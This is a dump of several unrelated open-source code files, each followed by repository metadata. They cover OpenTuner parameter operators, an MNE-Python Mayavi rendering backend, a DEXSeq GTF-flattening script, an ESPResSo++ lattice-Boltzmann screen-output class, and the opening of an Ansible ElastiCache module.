"""
value = numpy.random.rand(1, self.size) > 0.5
self._set(config, value)
def seed_value(self):
return numpy.random.rand(1, self.size) > 0.5
class FloatArray(Array):
"""
Represents an array of float values
"""
def __init__(self, name, size, fmax, fmin):
super(FloatArray, self).__init__(name, size)
self.fmax = fmax
self.fmin = fmin
def op1_randomize(self, config):
"""
Set this parameter's value in a configuration randomly
:param config: the configuration to be changed
"""
value = numpy.random.rand(1, self.size) * (
self.fmax - self.fmin) + self.fmin
self._set(config, value)
def seed_value(self):
value = numpy.random.rand(1, self.size) * (
self.fmax - self.fmin) + self.fmin
return value
def op3_swarm_parallel(self, cfg, cfg1, cfg2, c=1,
c1=0.5, c2=0.5, velocities=0):
"""
Simulates a single particle swarm optimization step for each element in the
array by updating the each position and returning an array of new velocities
The new velocity is given by
.. math:: c*velocity + r1*c1*(cfg1-cfg) + r2*c2*(cfg2-cfg)
where r1 and r2 are random values between 0 and 1. In each iteration, r1 and
r2 are constant across array elements
The new cfg positions are randomly chosen based on the new velocities
:param cfg: the configuration to be changed. This represents the current
position
:param cfg1: a configuration to shift towards. Should be the local best
position
:param cfg2: a configuration to shift towards. Should be the global best
position
:param c: the weight of the cfg velocities
:param c1: weight of cfg1
:param c2: weight of cfg2
:param velocities: the cfg velocities
:return: a numpy array of new velocities
"""
vs = velocities * c + (self.get_value(cfg1) - self.get_value(
cfg)) * c1 * random.random() + (self.get_value(
cfg2) - self.get_value(cfg)) * c2 * random.random()
p = self.get_value(cfg) + vs
p[p > self.fmax] = self.fmax
p[p < self.fmin] = self.fmin
self.set_value(cfg, p)
return vs
##################
class ManipulatorProxy(object):
"""
wrapper around configuration manipulator and config pair
"""
def __init__(self, manipulator, cfg):
self.cfg = cfg
self.manipulator = manipulator
self.params = manipulator.parameters_dict(self.cfg)
def keys(self):
return self.params.keys()
def __getitem__(self, k):
return ParameterProxy(self.params[k], self.cfg)
class ParameterProxy(object):
"""
wrapper aint parameter and config pair, adds config
as first argument to all method calls to parameter
"""
def __init__(self, param, cfg):
self.cfg = cfg
self.param = param
def __getattr__(self, key):
"""equivalent of self.param.key(self.cfg, ...)"""
member = getattr(self.param, key)
def param_method_proxy(*args, **kwargs):
return member(self.cfg, *args, **kwargs)
if callable(member):
return param_method_proxy
else:
# we should only hit this for key == 'name'
return member
# Inspection Methods
def operators(param, num_parents):
"""
Return a list of operators for the given parameter that take the specified
number of input configurations
:param param: a Parameter class
:param num_parents: a String specifying number of inputs required by the operator.
should be one of '1', '2', '3', '4', or 'n'
"""
ops = []
methods = inspect.getmembers(param, inspect.ismethod)
for m in methods:
name, obj = m
if is_operator(name, num_parents):
ops.append(name)
return ops
def composable_operators(param, min_num_parents):
"""
Return a list of operators for the given parameter that can be programatically composed
with a composable technique generating min_num_parents.
Programatically composable operators have no non-cfg arguments
:param param: a Parameter class
:param min_num_parents: the minimum number of parents passed to the operator
"""
if min_num_parents < 1:
return []
allowed_num_parents = ['n']
for i in range(1,5):
if i > min_num_parents:
break
allowed_num_parents.append(str(i))
ops = []
methods = inspect.getmembers(param, inspect.ismethod)
for m in methods:
name, obj = m
argspec = inspect.getargspec(obj)
numargs = len(argspec.args) - (len(argspec.defaults) if argspec.defaults else 0)
for num_parents in allowed_num_parents:
if is_operator(name, num_parents):
if num_parents == 'n':
if numargs == 3: # self, cfg, cfgs
ops.append(name)
else:
if numargs == (1 + int(num_parents)):
ops.append(name)
break
return ops
def is_operator(name, num_parents):
"""
Tells whether a method is an operator taking in the specified number of inputs
from the method name
:param name: the method name
:param num_parents: a String specifying number of inputs required by the operator.
should be one of '1', '2', '3', '4', or 'n'
"""
return ('op' + num_parents + '_') == name[:4]
def all_operators():
"""
Return a dictionary mapping from parameter names to lists of operator function
names
"""
ops = {}
for p in all_params():
name, obj = p
all_ops = []
for num in ['1', '2', '3', '4', 'n']:
all_ops += operators(obj, num)
ops[name] = all_ops
return ops
def all_params():
params = inspect.getmembers(sys.modules[__name__], lambda x: inspect.isclass(
x) and x.__module__ == __name__ and issubclass(x, Parameter))
return params
|
Sierangho/opentuner
|
opentuner/search/manipulator.py
|
Python
|
mit
| 58,606
|
[
"Gaussian",
"VisIt"
] |
df218ddae6405046621df7b70cc405e934d7ad772284caf51af5838258c2f0aa
|
"""
Core visualization operations based on Mayavi.
Actual implementation of _Renderer and _Projection classes.
"""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
# Mark Wronkiewicz <wronk.mark@gmail.com>
# Joan Massich <mailsik@gmail.com>
# Guillaume Favelier <guillaume.favelier@gmail.com>
#
# License: Simplified BSD
from contextlib import contextmanager
import warnings
import numpy as np
from mayavi.core.scene import Scene
from mayavi.core.ui.mayavi_scene import MayaviScene
from tvtk.pyface.tvtk_scene import TVTKScene
from .base_renderer import _BaseRenderer
from ._utils import _check_color
from ...surface import _normalize_vectors
from ...utils import (_import_mlab, _validate_type, SilenceStdout,
copy_base_doc_to_subclass_doc)
class _Projection(object):
"""Class storing projection information.
Attributes
----------
xy : array
Result of 2d projection of 3d data.
pts : Source
Mayavi source handle.
"""
def __init__(self, xy=None, pts=None):
"""Store input projection information into attributes."""
self.xy = xy
self.pts = pts
def visible(self, state):
"""Modify visibility attribute of the source."""
if self.pts is not None:
self.pts.visible = state
@copy_base_doc_to_subclass_doc
class _Renderer(_BaseRenderer):
"""Class managing rendering scene.
Attributes
----------
mlab: mayavi.mlab
Main Mayavi access point.
fig: mlab.Figure
Mayavi scene handle.
"""
def __init__(self, fig=None, size=(600, 600), bgcolor='black',
name=None, show=False, shape=(1, 1), smooth_shading=True):
if bgcolor is not None:
bgcolor = _check_color(bgcolor)
self.mlab = _import_mlab()
self.shape = shape
if fig is None:
self.fig = _mlab_figure(figure=name, bgcolor=bgcolor, size=size)
elif isinstance(fig, int):
self.fig = _mlab_figure(figure=fig, bgcolor=bgcolor, size=size)
else:
self.fig = fig
self.fig._window_size = size
_toggle_mlab_render(self.fig, show)
@property
def figure(self): # cross-compat w/PyVista
return self.fig
def subplot(self, x, y):
pass
def scene(self):
return self.fig
def set_interactive(self):
from tvtk.api import tvtk
if self.fig.scene is not None:
self.fig.scene.interactor.interactor_style = \
tvtk.InteractorStyleTerrain()
def mesh(self, x, y, z, triangles, color, opacity=1.0, shading=False,
backface_culling=False, scalars=None, colormap=None,
vmin=None, vmax=None, interpolate_before_map=True,
representation='surface', line_width=1., normals=None, **kwargs):
if color is not None:
color = _check_color(color)
if color is not None and isinstance(color, np.ndarray) \
and color.ndim > 1:
if color.shape[1] == 3:
vertex_color = np.c_[color, np.ones(len(color))] * 255.0
else:
vertex_color = color * 255.0
# create a lookup table to enable one color per vertex
scalars = np.arange(len(color))
color = None
else:
vertex_color = None
with warnings.catch_warnings(record=True): # traits
surface = self.mlab.triangular_mesh(x, y, z, triangles,
color=color,
scalars=scalars,
opacity=opacity,
figure=self.fig,
vmin=vmin,
vmax=vmax,
representation=representation,
line_width=line_width,
**kwargs)
l_m = surface.module_manager.scalar_lut_manager
if vertex_color is not None:
l_m.lut.table = vertex_color
elif isinstance(colormap, np.ndarray):
if colormap.dtype == np.uint8:
l_m.lut.table = colormap
elif colormap.dtype == np.float64:
l_m.load_lut_from_list(colormap)
else:
raise TypeError('Expected type for colormap values are'
' np.float64 or np.uint8: '
'{} was given'.format(colormap.dtype))
elif colormap is not None:
from matplotlib.cm import get_cmap
l_m.load_lut_from_list(
get_cmap(colormap)(np.linspace(0, 1, 256)))
surface.actor.property.shading = shading
surface.actor.property.backface_culling = backface_culling
return surface
def contour(self, surface, scalars, contours, width=1.0, opacity=1.0,
vmin=None, vmax=None, colormap=None,
normalized_colormap=False, kind='line', color=None):
mesh = _create_mesh_surf(surface, self.fig, scalars=scalars)
with warnings.catch_warnings(record=True): # traits
cont = self.mlab.pipeline.contour_surface(
mesh, contours=contours, line_width=width, vmin=vmin,
vmax=vmax, opacity=opacity, figure=self.fig)
cont.module_manager.scalar_lut_manager.lut.table = colormap
return cont
def surface(self, surface, color=None, opacity=1.0,
vmin=None, vmax=None, colormap=None,
normalized_colormap=False, scalars=None,
backface_culling=False):
if color is not None:
color = _check_color(color)
if normalized_colormap:
colormap = colormap * 255.0
# Make a solid surface
mesh = _create_mesh_surf(surface, self.fig, scalars=scalars)
with warnings.catch_warnings(record=True): # traits
surface = self.mlab.pipeline.surface(
mesh, color=color, opacity=opacity, vmin=vmin, vmax=vmax,
figure=self.fig)
if colormap is not None:
surface.module_manager.scalar_lut_manager.lut.table = colormap
surface.actor.property.backface_culling = backface_culling
def sphere(self, center, color, scale, opacity=1.0,
resolution=8, backface_culling=False,
radius=None):
color = _check_color(color)
center = np.atleast_2d(center)
x, y, z = center.T
surface = self.mlab.points3d(x, y, z, color=color,
resolution=resolution,
scale_factor=scale, opacity=opacity,
figure=self.fig)
surface.actor.property.backface_culling = backface_culling
def tube(self, origin, destination, radius=0.001, color='white',
scalars=None, vmin=None, vmax=None, colormap='RdBu',
normalized_colormap=False, reverse_lut=False):
color = _check_color(color)
origin = np.atleast_2d(origin)
destination = np.atleast_2d(destination)
if scalars is None:
# TODO: iterating over each tube rather than plotting in
# one call may be slow.
# See https://github.com/mne-tools/mne-python/issues/7644
for idx in range(origin.shape[0]):
surface = self.mlab.plot3d([origin[idx, 0],
destination[idx, 0]],
[origin[idx, 1],
destination[idx, 1]],
[origin[idx, 2],
destination[idx, 2]],
tube_radius=radius,
color=color,
figure=self.fig)
else:
for idx in range(origin.shape[0]):
surface = self.mlab.plot3d([origin[idx, 0],
destination[idx, 0]],
[origin[idx, 1],
destination[idx, 1]],
[origin[idx, 2],
destination[idx, 2]],
[scalars[idx, 0],
scalars[idx, 1]],
tube_radius=radius,
vmin=vmin,
vmax=vmax,
colormap=colormap,
figure=self.fig)
surface.module_manager.scalar_lut_manager.reverse_lut = reverse_lut
return surface
def quiver3d(self, x, y, z, u, v, w, color, scale, mode, resolution=8,
glyph_height=None, glyph_center=None, glyph_resolution=None,
opacity=1.0, scale_mode='none', scalars=None,
backface_culling=False, colormap=None, vmin=None, vmax=None,
line_width=2., name=None):
color = _check_color(color)
with warnings.catch_warnings(record=True): # traits
if mode in ('arrow', '2darrow', '3darrow'):
self.mlab.quiver3d(x, y, z, u, v, w, mode=mode,
color=color, scale_factor=scale,
scale_mode=scale_mode,
resolution=resolution, scalars=scalars,
opacity=opacity, figure=self.fig)
elif mode == 'cone':
self.mlab.quiver3d(x, y, z, u, v, w, color=color,
mode=mode, scale_factor=scale,
opacity=opacity, figure=self.fig)
elif mode == 'cylinder':
quiv = self.mlab.quiver3d(x, y, z, u, v, w, mode=mode,
color=color, scale_factor=scale,
opacity=opacity, figure=self.fig)
quiv.glyph.glyph_source.glyph_source.height = glyph_height
quiv.glyph.glyph_source.glyph_source.center = glyph_center
quiv.glyph.glyph_source.glyph_source.resolution = \
glyph_resolution
quiv.actor.property.backface_culling = backface_culling
def text2d(self, x_window, y_window, text, size=14, color='white',
justification=None):
if color is not None:
color = _check_color(color)
size = 14 if size is None else size
with warnings.catch_warnings(record=True): # traits
text = self.mlab.text(x_window, y_window, text, color=color,
figure=self.fig)
text.property.font_size = size
text.actor.text_scale_mode = 'viewport'
if isinstance(justification, str):
text.property.justification = justification
def text3d(self, x, y, z, text, scale, color='white'):
color = _check_color(color)
with warnings.catch_warnings(record=True): # traits
self.mlab.text3d(x, y, z, text, scale=scale, color=color,
figure=self.fig)
def scalarbar(self, source, color="white", title=None, n_labels=4,
bgcolor=None):
with warnings.catch_warnings(record=True): # traits
bar = self.mlab.scalarbar(source, title=title, nb_labels=n_labels)
if color is not None:
bar.label_text_property.color = _check_color(color)
if bgcolor is not None:
from tvtk.api import tvtk
bgcolor = np.asarray(bgcolor)
bgcolor = np.append(bgcolor, 1.0) * 255.
cmap = source.module_manager.scalar_lut_manager
lut = cmap.lut
ctable = lut.table.to_array()
cbar_lut = tvtk.LookupTable()
cbar_lut.deep_copy(lut)
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_lut = ctable.copy()
use_lut[:, -1] = 255.
vals = (use_lut * alphas) + bgcolor * (1 - alphas)
cbar_lut.table.from_array(vals)
cmap.scalar_bar.lookup_table = cbar_lut
def show(self):
if self.fig is not None:
_toggle_mlab_render(self.fig, True)
def close(self):
_close_3d_figure(figure=self.fig)
def set_camera(self, azimuth=None, elevation=None, distance=None,
focalpoint=None):
_set_3d_view(figure=self.fig, azimuth=azimuth,
elevation=elevation, distance=distance,
focalpoint=focalpoint)
def reset_camera(self):
renderer = getattr(self.fig.scene, 'renderer', None)
if renderer is not None:
renderer.reset_camera()
def screenshot(self, mode='rgb', filename=None):
return _take_3d_screenshot(figure=self.fig, mode=mode,
filename=filename)
def project(self, xyz, ch_names):
xy = _3d_to_2d(self.fig, xyz)
xy = dict(zip(ch_names, xy))
pts = self.fig.children[-1]
return _Projection(xy=xy, pts=pts)
def enable_depth_peeling(self):
if self.fig.scene is not None:
self.fig.scene.renderer.use_depth_peeling = True
def remove_mesh(self, surface):
if self.fig.scene is not None:
self.fig.scene.renderer.remove_actor(surface.actor)
def _mlab_figure(**kwargs):
"""Create a Mayavi figure using our defaults."""
from .._3d import _get_3d_option
fig = _import_mlab().figure(**kwargs)
# If using modern VTK/Mayavi, improve rendering with FXAA
antialias = _get_3d_option('antialias')
if antialias and hasattr(getattr(fig.scene, 'renderer', None), 'use_fxaa'):
fig.scene.renderer.use_fxaa = True
return fig
def _toggle_mlab_render(fig, render):
mlab = _import_mlab()
if mlab.options.backend != 'test':
fig.scene.disable_render = not render
def _create_mesh_surf(surf, fig=None, scalars=None, vtk_normals=True):
"""Create Mayavi mesh from MNE surf."""
mlab = _import_mlab()
x, y, z = surf['rr'].T
with warnings.catch_warnings(record=True): # traits
mesh = mlab.pipeline.triangular_mesh_source(
x, y, z, surf['tris'], scalars=scalars, figure=fig)
if vtk_normals:
mesh = mlab.pipeline.poly_data_normals(mesh)
mesh.filter.compute_cell_normals = False
mesh.filter.consistency = False
mesh.filter.non_manifold_traversal = False
mesh.filter.splitting = False
else:
# make absolutely sure these are normalized for Mayavi
nn = surf['nn'].copy()
_normalize_vectors(nn)
mesh.data.point_data.normals = nn
mesh.data.cell_data.normals = None
return mesh
def _3d_to_2d(fig, xyz):
"""Convert 3d points to a 2d perspective using a Mayavi Scene."""
_validate_type(fig, Scene, "fig", "Scene")
xyz = np.column_stack([xyz, np.ones(xyz.shape[0])])
# Transform points into 'unnormalized' view coordinates
comb_trans_mat = _get_world_to_view_matrix(fig.scene)
view_coords = np.dot(comb_trans_mat, xyz.T).T
# Divide through by the fourth element for normalized view coords
norm_view_coords = view_coords / (view_coords[:, 3].reshape(-1, 1))
# Transform from normalized view coordinates to display coordinates.
view_to_disp_mat = _get_view_to_display_matrix(fig.scene)
xy = np.dot(view_to_disp_mat, norm_view_coords.T).T
# Pull the first two columns since they're meaningful for 2d plotting
xy = xy[:, :2]
return xy
def _get_world_to_view_matrix(scene):
"""Return the 4x4 matrix to transform xyz space to the current view.
This is a concatenation of the model view and perspective transforms.
"""
_validate_type(scene, (MayaviScene, TVTKScene), "scene",
"TVTKScene/MayaviScene")
cam = scene.camera
# The VTK method needs the aspect ratio and near and far
# clipping planes in order to return the proper transform.
scene_size = tuple(scene.get_size())
clip_range = cam.clipping_range
aspect_ratio = float(scene_size[0]) / scene_size[1]
# Get the vtk matrix object using the aspect ratio we defined
vtk_comb_trans_mat = cam.get_composite_projection_transform_matrix(
aspect_ratio, clip_range[0], clip_range[1])
vtk_comb_trans_mat = vtk_comb_trans_mat.to_array()
return vtk_comb_trans_mat
def _get_view_to_display_matrix(scene):
"""Return the 4x4 matrix to convert view coordinates to display coords.
It's assumed that the view should take up the entire window and that the
origin of the window is in the upper left corner.
"""
_validate_type(scene, (MayaviScene, TVTKScene), "scene",
"TVTKScene/MayaviScene")
# normalized view coordinates have the origin in the middle of the space
# so we need to scale by width and height of the display window and shift
# by half width and half height. The matrix accomplishes that.
x, y = tuple(scene.get_size())
view_to_disp_mat = np.array([[x / 2.0, 0., 0., x / 2.0],
[0., -y / 2.0, 0., y / 2.0],
[0., 0., 1., 0.],
[0., 0., 0., 1.]])
return view_to_disp_mat
def _close_all():
from mayavi import mlab
mlab.close(all=True)
def _set_3d_view(figure, azimuth, elevation, focalpoint, distance):
from mayavi import mlab
with warnings.catch_warnings(record=True): # traits
with SilenceStdout():
mlab.view(azimuth, elevation, distance,
focalpoint=focalpoint, figure=figure)
mlab.draw(figure)
def _set_3d_title(figure, title, size=40):
from mayavi import mlab
text = mlab.title(text='', figure=figure)
text.property.vertical_justification = 'top'
text.property.font_size = size
mlab.draw(figure)
def _check_3d_figure(figure):
try:
import mayavi # noqa F401
except Exception:
raise TypeError('figure must be a mayavi scene but the'
'mayavi package is not found.')
else:
from mayavi.core.scene import Scene
if not isinstance(figure, Scene):
raise TypeError('figure must be a mayavi scene.')
def _save_figure(img, filename):
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
fig = Figure(frameon=False)
FigureCanvasAgg(fig)
fig.figimage(img, resize=True)
fig.savefig(filename)
def _close_3d_figure(figure):
from mayavi import mlab
mlab.close(figure)
def _take_3d_screenshot(figure, mode='rgb', filename=None):
from mayavi import mlab
from mne.viz.backends.renderer import MNE_3D_BACKEND_TESTING
if MNE_3D_BACKEND_TESTING:
ndim = 3 if mode == 'rgb' else 4
if figure.scene is None:
figure_size = figure._window_size
else:
figure_size = figure.scene._renwin.size
return np.zeros(tuple(figure_size) + (ndim,), np.uint8)
else:
from pyface.api import GUI
gui = GUI()
gui.process_events()
with warnings.catch_warnings(record=True): # traits
img = mlab.screenshot(figure, mode=mode)
if isinstance(filename, str):
_save_figure(img, filename)
return img
@contextmanager
def _testing_context(interactive):
mlab = _import_mlab()
orig_backend = mlab.options.backend
mlab.options.backend = 'test'
try:
yield
finally:
mlab.options.backend = orig_backend
|
Teekuningas/mne-python
|
mne/viz/backends/_pysurfer_mayavi.py
|
Python
|
bsd-3-clause
| 20,456
|
[
"Mayavi",
"VTK"
] |
a6d22b7c966cf93d7295e69b48361d970a5835ce70bacb23a5f9a75a8c6be839
|
#!/usr/bin/env python
import sys, collections, itertools, os.path, optparse
optParser = optparse.OptionParser(
usage = "python %prog [options] <in.gtf> <out.gff>",
description=
"Script to prepare annotation for DEXSeq." +
"This script takes an annotation file in Ensembl GTF format" +
"and outputs a 'flattened' annotation file suitable for use " +
"with the count_in_exons.py script ",
epilog =
"Written by Simon Anders (sanders@fs.tum.de), European Molecular Biology " +
"Laboratory (EMBL). (c) 2010. Released under the terms of the GNU General " +
"Public License v3. Part of the 'DEXSeq' package." )
optParser.add_option( "-r", "--aggregate", type="choice", dest="aggregate",
choices = ( "no", "yes" ), default = "yes",
help = "'yes' or 'no'. Indicates whether two or more genes sharing an exon should be merged into an 'aggregate gene'. If 'no', the exons that can not be assiged to a single gene are ignored." )
(opts, args) = optParser.parse_args()
if len( args ) != 2:
sys.stderr.write( "Script to prepare annotation for DEXSeq.\n\n" )
sys.stderr.write( "Usage: python %s <in.gtf> <out.gff>\n\n" % os.path.basename(sys.argv[0]) )
sys.stderr.write( "This script takes an annotation file in Ensembl GTF format\n" )
sys.stderr.write( "and outputs a 'flattened' annotation file suitable for use\n" )
sys.stderr.write( "with the count_in_exons.py script.\n" )
sys.exit(1)
try:
import HTSeq
except ImportError:
sys.stderr.write( "Could not import HTSeq. Please install the HTSeq Python framework\n" )
sys.stderr.write( "available from http://www-huber.embl.de/users/anders/HTSeq\n" )
sys.exit(1)
gtf_file = args[0]
out_file = args[1]
aggregateGenes = opts.aggregate == "yes"
# Step 1: Store all exons with their gene and transcript ID
# in a GenomicArrayOfSets
exons = HTSeq.GenomicArrayOfSets( "auto", stranded=True )
for f in HTSeq.GFF_Reader( gtf_file ):
if f.type != "exon":
continue
f.attr['gene_id'] = f.attr['gene_id'].replace( ":", "_" )
exons[f.iv] += ( f.attr['gene_id'], f.attr['transcript_id'] )
# Step 2: Form sets of overlapping genes
# We produce the dict 'gene_sets', whose values are sets of gene IDs. Each set
# contains IDs of genes that overlap, i.e., share bases (on the same strand).
# The keys of 'gene_sets' are the IDs of all genes, and each key refers to
# the set that contains the gene.
# Each gene set forms an 'aggregate gene'.
if aggregateGenes == True:
gene_sets = collections.defaultdict( lambda: set() )
for iv, s in exons.steps():
# For each step, make a set, 'full_set' of all the gene IDs occuring
# in the present step, and also add all those gene IDs, whch have been
# seen earlier to co-occur with each of the currently present gene IDs.
full_set = set()
for gene_id, transcript_id in s:
full_set.add( gene_id )
full_set |= gene_sets[ gene_id ]
# Make sure that all genes that are now in full_set get associated
# with full_set, i.e., get to know about their new partners
for gene_id in full_set:
assert gene_sets[ gene_id ] <= full_set
gene_sets[ gene_id ] = full_set
# Step 3: Go through the steps again to get the exonic sections. Each step
# becomes an 'exonic part'. The exonic part is associated with an
# aggregate gene, i.e., a gene set as determined in the previous step,
# and a transcript set, containing all transcripts that occur in the step.
# The results are stored in the dict 'aggregates', which contains, for each
# aggregate ID, a list of all its exonic_part features.
aggregates = collections.defaultdict( lambda: list() )
for iv, s in exons.steps( ):
# Skip empty steps
if len(s) == 0:
continue
gene_id = list(s)[0][0]
## if aggregateGenes=FALSE, ignore the exons associated to more than one gene ID
if aggregateGenes == False:
check_set = set()
for geneID, transcript_id in s:
check_set.add( geneID )
if( len( check_set ) > 1 ):
continue
else:
aggregate_id = gene_id
# Take one of the gene IDs, find the others via gene sets, and
# form the aggregate ID from all of them
else:
assert set( gene_id for gene_id, transcript_id in s ) <= gene_sets[ gene_id ]
aggregate_id = '+'.join( gene_sets[ gene_id ] )
# Make the feature and store it in 'aggregates'
f = HTSeq.GenomicFeature( aggregate_id, "exonic_part", iv )
f.source = os.path.basename( sys.argv[0] )
# f.source = "camara"
f.attr = {}
f.attr[ 'gene_id' ] = aggregate_id
transcript_set = set( ( transcript_id for gene_id, transcript_id in s ) )
f.attr[ 'transcripts' ] = '+'.join( transcript_set )
aggregates[ aggregate_id ].append( f )
# Step 4: For each aggregate, number the exonic parts
aggregate_features = []
for l in aggregates.values():
for i in xrange( len(l)-1 ):
assert l[i].name == l[i+1].name, str(l[i+1]) + " has wrong name"
assert l[i].iv.end <= l[i+1].iv.start, str(l[i+1]) + " starts too early"
if l[i].iv.chrom != l[i+1].iv.chrom:
raise ValueError, "Same name found on two chromosomes: %s, %s" % ( str(l[i]), str(l[i+1]) )
if l[i].iv.strand != l[i+1].iv.strand:
raise ValueError, "Same name found on two strands: %s, %s" % ( str(l[i]), str(l[i+1]) )
aggr_feat = HTSeq.GenomicFeature( l[0].name, "aggregate_gene",
HTSeq.GenomicInterval( l[0].iv.chrom, l[0].iv.start,
l[-1].iv.end, l[0].iv.strand ) )
aggr_feat.source = os.path.basename( sys.argv[0] )
aggr_feat.attr = { 'gene_id': aggr_feat.name }
for i in xrange( len(l) ):
l[i].attr['exonic_part_number'] = "%03d" % ( i+1 )
aggregate_features.append( aggr_feat )
# Step 5: Sort the aggregates, then write everything out
aggregate_features.sort( key = lambda f: ( f.iv.chrom, f.iv.start ) )
fout = open( out_file, "w" )
for aggr_feat in aggregate_features:
fout.write( aggr_feat.get_gff_line() )
for f in aggregates[ aggr_feat.name ]:
fout.write( f.get_gff_line() )
fout.close()
|
g1o/trinityrnaseq
|
trinity-plugins/DEXseq_util/dexseq_prepare_annotation.py
|
Python
|
bsd-3-clause
| 6,148
|
[
"HTSeq"
] |
6296b47314e0e774ee8d446a24660a75832beacf79040d0f6c4e00a5a3bc80aa
|
# Copyright (C) 2012-2016
# Max Planck Institute for Polymer Research
# Copyright (C) 2008-2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
Computes and outputs to the screen the simulation progress (finished step) and
controls mass flux conservation when using MD-to-LB coupling. Ideally, the sum of mass
fluxes should be :math:`0`, i.e. :math:`j_{LB} + j_{MD} = 0`.
.. py:class:: espressopp.analysis.LBOutputScreen(system,lb)
:param shared_ptr system: system object defined earlier in the python-script
:param lb_object lb: lattice boltzmann object defined earlier in the python-script
Example:
>>> # initialise output to the screen
>>> outputScreen = espressopp.analysis.LBOutputScreen(system,lb)
>>>
>>> # initialise external analysis object with previously created output object
>>> # and periodicity of invocation (steps):
>>> extAnalysis = espressopp.integrator.ExtAnalyze(outputScreen,100)
>>>
>>> # add the external analysis object as an extension to the integrator
>>> integrator.addExtension( extAnalysis )
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.analysis.LBOutput import *
from _espressopp import analysis_LBOutput_Screen
class LBOutputScreenLocal(LBOutputLocal, analysis_LBOutput_Screen):
def __init__(self, system, latticeboltzmann):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, analysis_LBOutput_Screen, system, latticeboltzmann)
if pmi.isController :
class LBOutputScreen(LBOutput):
__metaclass__ = pmi.Proxy
pmiproxydefs = dict(
cls = 'espressopp.analysis.LBOutputScreenLocal',
pmicall = ["writeOutput", "getLBMom", "getMDMom"]
)
|
kkreis/espressopp
|
src/analysis/LBOutputScreen.py
|
Python
|
gpl-3.0
| 2,490
|
[
"ESPResSo"
] |
955b3ea39c2803d7fb3b546ba82a59f6999f98efd6949df648562205444333d2
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: elasticache
short_description: Manage cache clusters in Amazon Elasticache.
description:
- Manage cache clusters in Amazon Elasticache.
- Returns information about the specified cache cluster.
version_added: "1.4"
author: "Jim Dalton (@jsdalton)"
options:
state:
description:
- C(absent) or C(present) are idempotent actions that will create or destroy a cache cluster as needed. C(rebooted) will reboot the cluster, resulting in a momentary outage.
choices: ['present', 'absent', 'rebooted']
required: true
name:
description:
- The cache cluster identifier
required: true
engine:
description:
- Name of the cache engine to be used (memcached or redis)
required: false
default: memcached
cache_engine_version:
description:
- The version number of the cache engine
required: false
default: none
node_type:
description:
- The compute and memory capacity of the nodes in the cache cluster
required: false
default: cache.m1.small
num_nodes:
description:
- The initial number of cache nodes that the cache cluster will have
required: false
cache_port:
description:
- The port number on which each of the cache nodes will accept connections
required: false
default: none
parameter_group:
description:
- Specify non-default parameter group names to be associated with cache cluster
required: false
default: None
cache_subnet_group:
description:
- The subnet group name to associate with. Only use if inside a vpc. Required if inside a vpc
required: conditional
default: None
version_added: "2.0"
security_group_ids:
description:
- A list of vpc security group names to associate with this cache cluster. Only use if inside a vpc
required: false
default: ['default']
version_added: "1.6"
cache_security_groups:
description:
- A list of cache security group names to associate with this cache cluster. Must be an empty list if inside a vpc
required: false
default: ['default']
zone:
description:
- The EC2 Availability Zone in which the cache cluster will be created
required: false
default: None
wait:
description:
- Wait for cache cluster result before returning
required: false
default: yes
choices: [ "yes", "no" ]
hard_modify:
description:
- Whether to destroy and recreate an existing cache cluster if necessary in order to modify its state
required: false
default: no
choices: [ "yes", "no" ]
region:
description:
- The AWS region to use. If not specified then the value of the AWS_REGION or EC2_REGION environment variable, if any, is used.
required: true
default: null
aliases: ['aws_region', 'ec2_region']
extends_documentation_fragment: aws
"""
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic example
- elasticache:
name: "test-please-delete"
state: present
engine: memcached
cache_engine_version: 1.4.14
node_type: cache.m1.small
num_nodes: 1
cache_port: 11211
cache_security_groups:
- default
zone: us-east-1d
# Ensure cache cluster is gone
- elasticache:
name: "test-please-delete"
state: absent
# Reboot cache cluster
- elasticache:
name: "test-please-delete"
state: rebooted
"""
import sys
import time
try:
import boto
from boto.elasticache.layer1 import ElastiCacheConnection
from boto.regioninfo import RegionInfo
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
class ElastiCacheManager(object):
"""Handles elasticache creation and destruction"""
EXIST_STATUSES = ['available', 'creating', 'rebooting', 'modifying']
def __init__(self, module, name, engine, cache_engine_version, node_type,
num_nodes, cache_port, parameter_group, cache_subnet_group,
cache_security_groups, security_group_ids, zone, wait,
hard_modify, region, **aws_connect_kwargs):
self.module = module
self.name = name
self.engine = engine
self.cache_engine_version = cache_engine_version
self.node_type = node_type
self.num_nodes = num_nodes
self.cache_port = cache_port
self.parameter_group = parameter_group
self.cache_subnet_group = cache_subnet_group
self.cache_security_groups = cache_security_groups
self.security_group_ids = security_group_ids
self.zone = zone
self.wait = wait
self.hard_modify = hard_modify
self.region = region
self.aws_connect_kwargs = aws_connect_kwargs
self.changed = False
self.data = None
self.status = 'gone'
self.conn = self._get_elasticache_connection()
self._refresh_data()
def ensure_present(self):
